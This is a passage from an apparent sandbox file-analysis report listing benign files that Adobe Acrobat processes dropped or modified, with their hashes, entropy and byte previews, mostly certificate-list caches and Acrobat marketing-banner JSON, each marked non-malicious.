                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):192
                                                                        Entropy (8bit):2.7673182398396405
                                                                        Encrypted:false
                                                                        SSDEEP:3:kkFklZ/Il1fllXlE/HT8k9CNNX8RolJuRdxLlGB9lQRYwpDdt:kKMT80yNMa8RdWBwRd
                                                                        MD5:15559E47303532D1C4ABA88B9D6388E1
                                                                        SHA1:1C60E5E49228DE109D0E7A08F9ED358F6E41EE64
                                                                        SHA-256:5F9EEDE196529CFECD937769DEF2D6A246D1A7AAEC2DA06FF10E50CED34B4E4B
                                                                        SHA-512:FF354281CD13E6ABAF8A7AF72265F60991B45741371F00E944D8FE526AEC90E0C6AC030DCD6FD99BA11598F7333E587CDDB8F42B0BEE6B7F45D8667B3A1CB138
                                                                        Malicious:false
                                                                        Preview:p...... ...........T.E..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):328
                                                                        Entropy (8bit):3.244101792565376
                                                                        Encrypted:false
                                                                        SSDEEP:6:kKYF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:pDImsLNkPlE99SNxAhUe/3
                                                                        MD5:7020CA502F2CB5BD08035D87ADBB4CB5
                                                                        SHA1:4E73DC2AF9E2E9BAEB412F558BB911B682729D1B
                                                                        SHA-256:7F7E4BA88BBB478EA331792910FBAE317AE02636DA3DA0FDF85EA9AAAE493776
                                                                        SHA-512:B5E8F99A3F6B977F274D2579E2DE17558B13216FCAE6F71CD67F5EE9393C670E7042DF7BF59E007F99CECA80E6752BEF3EA6F9CB4D7764C749D77B0FF0B59868
                                                                        Malicious:false
                                                                        Preview:p...... .........w.g.E..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):243196
                                                                        Entropy (8bit):3.3450692389394283
                                                                        Encrypted:false
                                                                        SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                                                        MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                                                        SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                                                        SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                                                        SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                                                        Malicious:false
                                                                        Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):295
                                                                        Entropy (8bit):5.367966270889577
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJM3g98kUwPeUkwRe9:YvXKXi9Zc0vwGMbLUkee9
                                                                        MD5:B3DF8899405009C44C3B532E494A99B2
                                                                        SHA1:38E9339349AA40A169B84AF6D34DA726E766FFEE
                                                                        SHA-256:13E89A2FD05A11F77CF1B0B2579F2EDEEAEE051013D12D86FF5DC993DB550FF7
                                                                        SHA-512:2DCE366534ED694FCDC416ECC1D3BAD6A56EFAAC5AE31473E4E6060DB807B5B6018F3DC8556D965D62A0501507EC58376F8C0F15DE0B78E2108F24B3BABF9B3F
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.315867881718603
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJfBoTfXpnrPeUkwRe9:YvXKXi9Zc0vwGWTfXcUkee9
                                                                        MD5:1B612D927ECF40BE7FA8E678F1AE8AC7
                                                                        SHA1:5BAC227BF9F46F7426C83C13332BAEF525369475
                                                                        SHA-256:24FA2A027FE55B9645F350C3307F174111F0867EDCF8576C126D6FB5758FE3F2
                                                                        SHA-512:CA3BF1CAB8E8ADD256BFC185C17EAEC461E43819437148799E02C2006EB7EF1C061D45FFA1BF6625164921BF3CEE956113B2E692CBB4BD03E8D1A5F321DB4CFD
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.2953544508560055
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJfBD2G6UpnrPeUkwRe9:YvXKXi9Zc0vwGR22cUkee9
                                                                        MD5:D82F7508B1C491F0A6D22D41D0A39E26
                                                                        SHA1:6A1B0B591B1DBAC8324D013C726D8A06E64F646A
                                                                        SHA-256:218A6AA99BF2C35C3FAC5E5AD2EEB7D8F3A3CDD502A75FA6CD78DC4912417161
                                                                        SHA-512:A06B08ECC5871119D0A36B37996B7ADCD39BA915821CA0AF8E0333CD9DF4E3CDD776A10ED0045496E52697131CF4A22C652B639493410577B1172F16E10A3308
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):285
                                                                        Entropy (8bit):5.355138281806574
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJfPmwrPeUkwRe9:YvXKXi9Zc0vwGH56Ukee9
                                                                        MD5:83708BA6EDF8995355FD67210786FE49
                                                                        SHA1:7AE06C23F67A8615F18E9A9C30F101901E583A14
                                                                        SHA-256:BF948492FD2FB9E81F57E99124C21F750DCAD0FED443BCE5E856E01BE40D8A7F
                                                                        SHA-512:91F9A5A23600023255092D11440118789C71FB98AD3F3023E8A1672F97C8BAFDE581F03406C8572402644A7BDEF4C87B93F6A02D7095CB5C704EF0DB9067FF43
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1123
                                                                        Entropy (8bit):5.686150004493072
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6XqzvtpLgE9cQx8LennAvzBvkn0RCmK8czOCCSD:YvRlhgy6SAFv5Ah8cv/D
                                                                        MD5:017C0153CD142A54FB8CBD925C8E76F9
                                                                        SHA1:D5E36CCF01025477E4E347BFB46590053664A217
                                                                        SHA-256:6B6F388CC8CB3EBA551A4DDDFF18179221E9FBFC35DE4CB51576381EF6633D5E
                                                                        SHA-512:F73F6EBE7407548FF412CE4FD353AD93404F6954C9E1AA38C1F1768B02B2728F3CEF410E295BF555E052FE67C4755724D02C4EC7046638F601E318F88C8B2934
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1122
                                                                        Entropy (8bit):5.681428896453232
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6XqzvxVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBe:YvRpFgSNycJUAh8cvYH1
                                                                        MD5:6F9271466D6C7C7AFDE29C96E3E91E46
                                                                        SHA1:951FA287200023C108A2FA557F2BAF86C003A45F
                                                                        SHA-256:04DB7461145C0B9B4CF7A94FEEF87B451C54B206B994B1C05EED1324516D710C
                                                                        SHA-512:BF7FD79F0E53709E42AD81BC450FA0F5B1695FC2E84B5936682C7E8D7CFDFDC3DC68C99F4EB82C60BD26C6035216B32B4AD82EB2D6724D3EBEEA741A4D493671
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):5.30445309280976
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJfQ1rPeUkwRe9:YvXKXi9Zc0vwGY16Ukee9
                                                                        MD5:35228495C2FAC631F542698B5A4091D4
                                                                        SHA1:4DE967F0412675EA6F77F152247426C06EB7C093
                                                                        SHA-256:9138E19E8C8575BF8CC9C72709071520D56654EB1610C8719C0BC0B7FEDFD6CF
                                                                        SHA-512:708C90FA66CC2EB810CC1CCC0437EF9C6610EE56A637218D8074D2C36189EA8751AB968A27E61D90C5787FE603917DE9D7534FA7BCFCB80163AC69914A40FC68
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1102
                                                                        Entropy (8bit):5.675866515188311
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6Xqzvg2LgErcXWl7y0nAvzIBcSJCBViVe:YvRYogH47yfkB5kVD
                                                                        MD5:DEBE10669009A8CBE08A8181511DA97F
                                                                        SHA1:59358493B0FEEF8E44854162C4D5BC909B46E52B
                                                                        SHA-256:61FEDD6AE4D0E7EC060C806F5A1C59605055E5DFD95EE4B1A744957E2D970A52
                                                                        SHA-512:9CF880CD18200FD06C726E5FD7C8EBF5CA445442BE4679BC07F65FFE4C5A850F098D0356C8F4302001BB5020190A4E775E448C159CCF59F333F3DA87C61C8A37
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1164
                                                                        Entropy (8bit):5.699692896933024
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6XqzvoKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5e:YvRQEgqprtrS5OZjSlwTmAfSKo
                                                                        MD5:4E471359A003E6309A5A04207308A8C7
                                                                        SHA1:2032410E2BFE9B8C274C886E6E5A3F2EAA21D430
                                                                        SHA-256:2A8073EAC13E3F8F558FCC9FCAD3C63F3CDD81DBCC7EB676AEF077D5C02FEADD
                                                                        SHA-512:F7114189347CCAE57AA7D30AFF871A4DC09A6F7804F9F2BD8F0BE8BC0A5367391E40433F21ED2DBD794609208734480ED3CE5E8D27E5ADC64290F9185D73909D
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.3054992007061825
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJfYdPeUkwRe9:YvXKXi9Zc0vwGg8Ukee9
                                                                        MD5:4A2BC3C61276965D59577FC4E5A025C2
                                                                        SHA1:28BA49371844A00EB3240D4B79982B440F0BE85D
                                                                        SHA-256:E0521F41852E9324F22E957703F21B1EABBC9513FBDD61676B9ED9FAB17F6411
                                                                        SHA-512:57DD2BD2E49776B57191E95B38AD1DB2DF583B68AB5572A75EEF70072D73335FC083921CBA69A5F94CBB0C9161AED7A0293805C668D834125719BBA3AF922E93
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):284
                                                                        Entropy (8bit):5.291945381370538
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJf+dPeUkwRe9:YvXKXi9Zc0vwG28Ukee9
                                                                        MD5:B8FB3245120B8B92DF41C2F350DC9A53
                                                                        SHA1:26149EFD23D11B2AEE617CBA47F90B2342DBDFA9
                                                                        SHA-256:A4EE0618CED0ED94AE96FD582D8185EA6CD16799E7A7A7AA3AF56F2233E3CBE5
                                                                        SHA-512:0C0F18ED846AF83670B8FB919BCF239964BA8A08CF8C7AAD83BEEFA50B09A1E75770061CC7709F3EA8E51F7FB82294BC8CB10027EBF4C9FAC78CFE147E5F7740
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):291
                                                                        Entropy (8bit):5.2890085031861895
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJfbPtdPeUkwRe9:YvXKXi9Zc0vwGDV8Ukee9
                                                                        MD5:EC342B76D2317FAF2D6C17D9C73EB49E
                                                                        SHA1:F756294E9DDC9C3BBC91893B5AC31C799E13FBFE
                                                                        SHA-256:5992748FDACF36D65832239029BB82FE13FE5EB9D391585A98B05B72C1D9F020
                                                                        SHA-512:189F9269C53DF3DCD59C70194E2AE93EE9EE4FDB4FB5D57B9FE237A1ED0291AE5B88ACF2C1B1AA5BCF955BFE2D6482BDCA487D32BB1BD1971F7FE43AE61CE065
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):287
                                                                        Entropy (8bit):5.294031938559345
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJf21rPeUkwRe9:YvXKXi9Zc0vwG+16Ukee9
                                                                        MD5:5380071D943380E707C5DDE4CFA42488
                                                                        SHA1:16231B4E3B42A7602AF0BF3A5C4C72701CD0D3F3
                                                                        SHA-256:B3F4892C1BB53313B4F5E580B59BC96F36ED11F77EFCFE1C12CA2AFF3D62A5D8
                                                                        SHA-512:93A83D34E644D8141B981EE02A635F2F9A69CB679F36E396A66ADCC65F2EEF5D2D4C0F89E287FAB75C2B2EB83E8CB96BF94768324A852C89339E4636AB4208A1
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1090
                                                                        Entropy (8bit):5.66335111938717
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6XqzvVamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSD:YvRRBgkDMUJUAh8cvMD
                                                                        MD5:5BC7534DBD5686EF8377B93B05740981
                                                                        SHA1:5C94EE0F024AA44F670D91AF27FEB39AC2BA61EE
                                                                        SHA-256:9CCA5200645DF0B5E2193D1900F8F244DC01F9A13313E4AAA4E41FCA2F3DABEF
                                                                        SHA-512:07341BAF9B6F545F15D2E799BCFB5AEA9150CF54E99D98BF905C7950A0BEA13D4F0A842F566487D7F60B1B03F5B2E455D18C5E16F9A144ED7DBF00FE915C52D6
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):286
                                                                        Entropy (8bit):5.268552113367189
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJfshHHrPeUkwRe9:YvXKXi9Zc0vwGUUUkee9
                                                                        MD5:C91640C4B3CB5FD28645EC3A331321F6
                                                                        SHA1:A04D1FF2AB41005531F28386EB1F468B093D863B
                                                                        SHA-256:01558148B5D5E88C2020F455D9264219C208DB6FF5C9A53D7D3FD10B5E5F68C3
                                                                        SHA-512:EBC7687EBFC220630352551F4DC03FC44C3CBB0617D355537B5358FBC449A9247DC9481F2FFC245BC9BC59EB9565534A573BD616B94E01FCB6D331CB42D19F7A
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"8b4fe976-fea8-4bd2-8d0d-aa371f6fb400","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1733424439223,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):282
                                                                        Entropy (8bit):5.277221739458663
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HXP6ktVoZcg1vRcR0YIoAvJTqgFCrPeUkwRe9:YvXKXi9Zc0vwGTq16Ukee9
                                                                        MD5:F3F5623EE4C9428DF03ED0C1430EF51F
                                                                        SHA1:A7F4F874F7E71CBB6052B028946781E73F32D989
